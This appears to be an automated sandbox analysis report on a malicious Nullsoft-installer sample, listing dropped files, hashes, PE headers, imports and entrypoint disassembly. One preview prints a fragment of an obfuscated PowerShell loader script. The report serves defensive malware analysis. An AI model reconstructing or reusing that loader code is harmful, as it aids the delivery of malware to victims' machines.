                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):53158
                                                                                                      Entropy (8bit):5.062687652912555
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                      MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                      C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Category:dropped
                                                                                                      Size (bytes):859890
                                                                                                      Entropy (8bit):7.71013146377017
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:wTJidkhIqHdLUTVbvGjO+BEbofv1gb0FQFDuykrMhiNAgZY8i3oXRKQCzcdYS:wTkQIwLUTVTNsfvSb0KFLsfZV+ER/
                                                                                                      MD5:C642619AD2A1AC39867C56CB2F889E78
                                                                                                      SHA1:A15C485E5DBACDB5776E2CEC6C3A1AF3C4A400D2
                                                                                                      SHA-256:F973B482345D4FF8AC164868B9F50CE95E47ED2648B57C400AB59F04457C9A4F
                                                                                                      SHA-512:6826587E16A8B919438C48FA68297FAF81B5D0868F0599301648F36D2A7421648ED9016EE760D3D9064DE4C293D6ED094FD96C601B190D1BB1AB23D3CE8B8A1D
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                      Reputation:low
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..........................................................................................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe:Zone.Identifier

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dvzdz35.zpu.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ig20fbq.fmi.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipuq2g5n.243.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdlduaep.5mb.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\depersonaliseredes\Opjustering\gerties\Ceylonteer.kae

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):489410
                                                                                                      Entropy (8bit):1.2436305558399738
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:cU0VmvQia2T11QAJnUkKziB0gN0lQus3vm1YAzEYu:QVr4Z1QAJnUkKzK0gGlav67u
                                                                                                      MD5:03ADD5EC69F2D821F4BDDF502603364B
                                                                                                      SHA1:CEB941FCEF1D7D81F2BCC650E311A074B72D4DB0
                                                                                                      SHA-256:A8850B76F116EB91305228F5F39B2B6152927531705DE707A60FC74B86DF4003
                                                                                                      SHA-512:4B5864679A31EA4B0268A758B8179E14A1A682059B393834DE0260315BC0D086F1D98E944E0429304FFF518105226C5A9FD991050D98168059C34BCA1A677B2C
                                                                                                      Malicious:false
                                                                                                      Preview:...W............................................................H..p.........;..................C.................................w............................j.......?........ .+................................................................c........b......................7......................H....................".......................................IG+.......................y...................................x...................................L..................+............8...................................................................................o..[......................................1...........................s..............................................4.............8.................E...................................................................T..........................................H..............................W..........................H.....................X................8................................<...........K........................

                                                                                                      C:\Users\user\AppData\Local\Temp\depersonaliseredes\Opjustering\gerties\Fleece.kar

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 42-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 34359738368.000000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):359870
                                                                                                      Entropy (8bit):1.2579154698125035
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:rJW+KJEK8CwPtS6DGm9KLLa+yoa6PQw3HNilLOurKGMTXU9NOXHeFG1jfERxHJ8i:iMCknb2N+S8kEqSe8PW7FZs4baLL
                                                                                                      MD5:8A6A8A75FE9A08909B09C7242C1B0C73
                                                                                                      SHA1:0EC96FBA81824408C7838638BDA73C6C1D055CFA
                                                                                                      SHA-256:1AAD58A3F50A3EF4E50AFCECBAF81D840F4E3F0C512BCC5844A1AEC594A06FF7
                                                                                                      SHA-512:4322DC485F01AD114244945AA63652B191E6BE6C5B4531678310C160AC8963A6FD30E3936747C9282C8EF147806324E99EE954929EB4F1568ADB71E8C89AD596
                                                                                                      Malicious:false
                                                                                                      Preview:....................................................p.................................................................!......................................Tm.......f.............................................X.................B.................j......................................................................t.....................u..........1............+..g....4.B.............................................................................].............Q......m.......................U.....................D..........................Y..y..........................................................t................................................$...............................................................................................................................X..........C....................................h.V...........E...............................................................................t.......................2...c..........................................

                                                                                                      C:\Users\user\AppData\Local\Temp\depersonaliseredes\Opjustering\gerties\montricens.fus

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):409643
                                                                                                      Entropy (8bit):1.258117650984378
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:oK/xjE18JOxBR9iH6C0q2bSbck323mbP5cA:ooEOAxsxw222bRn
                                                                                                      MD5:0B038FD9C23C723696185E52EBCCB874
                                                                                                      SHA1:26F3EE8ABCC584DC46AB1AF5C6B1C26C3914F1A8
                                                                                                      SHA-256:1E6B1012ABE05CD0B6409C6844E61C6314CF9EE5E04AF6E89352E09166C80B13
                                                                                                      SHA-512:8BE9637A6195820DBD8BF6FDB6B35CD0499F007E36FB2B474D9120559473A98EB09CD622821821B16C7DFCE9D98EDDC61D647A61025C4CC36F451C88569E3100
                                                                                                      Malicious:false
                                                                                                      Preview:...tB...........*...............................T..........w....O.............r...#......].....m.......I.....................H..................................................................................}2.Wa..................&......u...............M................c.......................................................................i...................9..."...........y...u......b.....)........................................................................^...........................G.............g..................................................................:.....p........k..................1................:............U...........................................I................................................A.......^..............0....]..........+...............................................l.........k...................................................r....-.............................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (4279), with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72669
                                                                                                      Entropy (8bit):5.180695376146685
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:crIzuUsAUTINNzySs5SWFwxUZiIL9BCIxbpqhg/SMe0IAy3nHyA93Xj:JzpsvINIHFghq9BCIJEjRDj
                                                                                                      MD5:209C7B647C3E79CED487D0AD4EB5FA7A
                                                                                                      SHA1:23EC5B5C5E8416701FDBE1579685A88EC88A3AC9
                                                                                                      SHA-256:25DE529A818ED3E2C5609D0C210F2D259385591B27AA5DF9D42E5D1AABB3381B
                                                                                                      SHA-512:1BAE296733140432E001F4A32C91F427583EDA055124ACFFA986230C95F7FD4B4E19426CDC6FEF283509AF8E79FA82ED10A4B172109AB14FA6E9089F0F6C02D0
                                                                                                      Malicious:false
                                                                                                      Preview:$Untenable=$Thiol;........$Rubbaboos = @'.Monalis.Narc.ti$UdriggeDSkdern iSkrukkel EnsilelStartkoy ArteridKaliumkaEqui islUnremailDiskretyWattles= Rup,ah$ Di.locGHeadrensVanguartubeboete SamstelBenjyomrF.kkuwae JonglrrSclerothTransceaConsentaOvermornRestuffdPrecleabScutello,tyrefugGard,ofe PlanlgnAvant asOsphyal;Rebu in. AnmeldfFadsernuSarcostnHwtkursc etorctLysestbi nklago AswashnHumpe r Astro oRTrykknaeInductovRepr.valForhold Tttrykt(Rallyer$AfdelinSEgriotpkEvigungaRep obatComputet NonapheWhi,masfKa ereaoArcha.grFe.tprohPosthasoQuadrill Cep aldTilb gg,Svajmas$CarfareO AfstalpUncritigjordslaaEmneo rvBgegrenePladshotTamkatseseptibrkBanjoristerape t RutebaeCounterr Zygo p)fagf,re W mplel{Kinstet.Stopban. Puert,$Lder,inDUddatafrSca ersosolweigsOrgano,tPrecondeTilisenrBrkmiddnUpquiveeCoat essArbejds Sw.tchs(PriskaiKVerdensoNdodermlIcelandiLysbilln Impr,bsOmfavnek Flageli.ourmaleParthensTremast Shalet'anysi,uH ForskeaStres fm MaintarInterlaiMonap anStiffru,Pedigre$ ToplesVMa tyrmiKogni

                                                                                                      C:\Users\user\AppData\Local\Temp\depersonaliseredes\Wadder.Uns

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):336043
                                                                                                      Entropy (8bit):7.675092239153557
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:AjsIob4cvwR5JbeZRMxJkYJjbd3rsKkto/UYjlVZE9eNj3:AjsdbHIReZa3jlonvYjRN7
                                                                                                      MD5:FCF8B2C76841993BF7C2177DD2C95355
                                                                                                      SHA1:40426930BCD8953016ED450460486AE4A46F3B82
                                                                                                      SHA-256:C048A296F897683FD8DE87F573E56C4480865DB3E7D0F52E3A49CA558BFD07D3
                                                                                                      SHA-512:98A5883A3DB5E36FB412D41826C7D34C4B1112A12F45025ECE5678632A893B613D7AF404BCCF15939065FFF3443EBF23BBC04D949FBA9A8CC907298DD55D79AE
                                                                                                      Malicious:false
                                                                                                      Preview:...LLL..........q.`.............K........==.........55......N...A.''......))..pp.+++....."""""""...(..............................DDD......................L..00.....................F.8........CCC.z...................xx....................0....... ..~~."...@.....ooooo................4.......r..tttttt.........v.....................888...........6.....88888888888.......r................cc....--.a..``.................T......G.........l.E...b............}.$......D.DD..E.....//.ff.|||.... .........77.}...........RR...............sss.u.-........r.2222........@@....HH........HH........... .nnn......................................::.yyy.................................TTT...uu....8.v.{...111111.....^^^^...................P.U...........^.3.kk.......?......D.............WWWWW........%...^.Z...................Q......................n................****........FFF....p...........HH...........##.........Y..................++.%%%..................\\\\\\.@@@...........}.............&&...........

                                                                                                      C:\Users\user\AppData\Local\Temp\depersonaliseredes\udsds.aut

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):499434
                                                                                                      Entropy (8bit):1.2603431949153356
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:fIH5W+q2nuI9Zg1tjaKFi1fc/si9MKqe79+cX2v4Jm:fIHJnZ9+Za/1fwr9FN
                                                                                                      MD5:152C1126D35B77FC957526436ADBEA38
                                                                                                      SHA1:A8B0E26555F1FAAB8ED05EAAF9DDE5DCA113572B
                                                                                                      SHA-256:67780594962B62DD23C55340C9AB1CD11858C15F464E8EE312A690A1759EAFD3
                                                                                                      SHA-512:A8BC5BE5A093095759D3ADB587B58B083DAD6FC9B942161D1A9F0B055E314C69506BAE2409E3D5E195068FB8BAE2C4F1EFFAD6A082276423F9989AF012A5A856
                                                                                                      Malicious:false
                                                                                                      Preview:................................I.....l........................k.......a.......................w....................=...................b.......................{.......+..............................=..................................h............. ......................&.g..........................#.........&..............E.........................................................................................................................................../.........j..{.........<....l......+...........4.........................................................?.................F....................~............~...................u..................P.................'....................................................................j.......................................................O..D............ ..................................V....................................................................8................S.......................................................\..

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Entropy (8bit):7.71013146377017
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:Cpfkf79Rzk.exe
                                                                                                      File size:859'890 bytes
                                                                                                      MD5:c642619ad2a1ac39867c56cb2f889e78
                                                                                                      SHA1:a15c485e5dbacdb5776e2cec6c3a1af3c4a400d2
                                                                                                      SHA256:f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f
                                                                                                      SHA512:6826587e16a8b919438c48fa68297faf81b5d0868f0599301648f36d2a7421648ed9016ee760d3d9064de4c293d6ed094fd96c601b190d1bb1ab23d3ce8b8a1d
                                                                                                      SSDEEP:12288:wTJidkhIqHdLUTVbvGjO+BEbofv1gb0FQFDuykrMhiNAgZY8i3oXRKQCzcdYS:wTkQIwLUTVTNsfvSb0KFLsfZV+ER/
                                                                                                      TLSH:000512C1BA4472FEFA978A3CB927859307A76D16158479DA23E0F36F54730A3C213B52
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....

                                                                                                      File Icon

                                                                                                      Icon Hash:07290d2d7979330f

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x403359
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 000002D4h
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      push 00000020h
                                                                                                      pop edi
                                                                                                      xor ebx, ebx
                                                                                                      push 00008001h
                                                                                                      mov dword ptr [esp+14h], ebx
                                                                                                      mov dword ptr [esp+10h], 0040A2E0h
                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                      call dword ptr [004080A8h]
                                                                                                      call dword ptr [004080A4h]
                                                                                                      and eax, BFFFFFFFh
                                                                                                      cmp ax, 00000006h
                                                                                                      mov dword ptr [0042A20Ch], eax
                                                                                                      je 00007F55847DD653h
                                                                                                      push ebx
                                                                                                      call 00007F55847E0905h
                                                                                                      cmp eax, ebx
                                                                                                      je 00007F55847DD649h
                                                                                                      push 00000C00h
                                                                                                      call eax
                                                                                                      mov esi, 004082B0h
                                                                                                      push esi
                                                                                                      call 00007F55847E087Fh
                                                                                                      push esi
                                                                                                      call dword ptr [00408150h]
                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                      cmp byte ptr [esi], 00000000h
                                                                                                      jne 00007F55847DD62Ch
                                                                                                      push 0000000Ah
                                                                                                      call 00007F55847E08D8h
                                                                                                      push 00000008h
                                                                                                      call 00007F55847E08D1h
                                                                                                      push 00000006h
                                                                                                      mov dword ptr [0042A204h], eax
                                                                                                      call 00007F55847E08C5h
                                                                                                      cmp eax, ebx
                                                                                                      je 00007F55847DD651h
                                                                                                      push 0000001Eh
                                                                                                      call eax
                                                                                                      test eax, eax
                                                                                                      je 00007F55847DD649h
                                                                                                      or byte ptr [0042A20Fh], 00000040h
                                                                                                      push ebp
                                                                                                      call dword ptr [00408044h]
                                                                                                      push ebx
                                                                                                      call dword ptr [004082A0h]
                                                                                                      mov dword ptr [0042A2D8h], eax
                                                                                                      push ebx
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 000002B4h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      push 004216A8h
                                                                                                      call dword ptr [00408188h]
                                                                                                      push 0040A2C8h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x2cb90.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x62a50x64005814efda24a547f46f687d77de540309False0.6590234375data6.431421556070023IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x80000x13960x1400ef1be07ca8b096915258569fb3718a3cFalse0.453125data5.159710562612049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .ndata0x2b0000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0x5d0000x2cb900x2cc0029feacfb95f10d2c97620b954bab0c03False0.5635693086592178data5.592801421778874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_ICON0x5d4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.5097598485744707
                                                                                                      RT_ICON0x6dc400xc828Device independent bitmap graphic, 128 x 256 x 24, image size 51200EnglishUnited States0.5580210772833724
                                                                                                      RT_ICON0x7a4680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.6542276806802079
                                                                                                      RT_ICON0x7e6900x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.585202492211838
                                                                                                      RT_ICON0x818b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6878630705394191
                                                                                                      RT_ICON0x83e600x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.5887404580152672
                                                                                                      RT_ICON0x85b080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7556285178236398
                                                                                                      RT_ICON0x86bb00xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.6117283950617284
                                                                                                      RT_ICON0x878580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7889344262295082
                                                                                                      RT_ICON0x881e00x748Device independent bitmap graphic, 24 x 48 x 24, image size 1824EnglishUnited States0.6357296137339056
                                                                                                      RT_ICON0x889280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8608156028368794
                                                                                                      RT_ICON0x88d900x368Device independent bitmap graphic, 16 x 32 x 24, image size 832EnglishUnited States0.658256880733945
                                                                                                      RT_DIALOG0x890f80x120dataEnglishUnited States0.5104166666666666
                                                                                                      RT_DIALOG0x892180x11cdataEnglishUnited States0.6056338028169014
                                                                                                      RT_DIALOG0x893380xc4dataEnglishUnited States0.5918367346938775
                                                                                                      RT_DIALOG0x894000x60dataEnglishUnited States0.7291666666666666
                                                                                                      RT_GROUP_ICON0x894600xaedataEnglishUnited States0.6206896551724138
                                                                                                      RT_VERSION0x895100x340dataEnglishUnited States0.4951923076923077
                                                                                                      RT_MANIFEST0x898500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
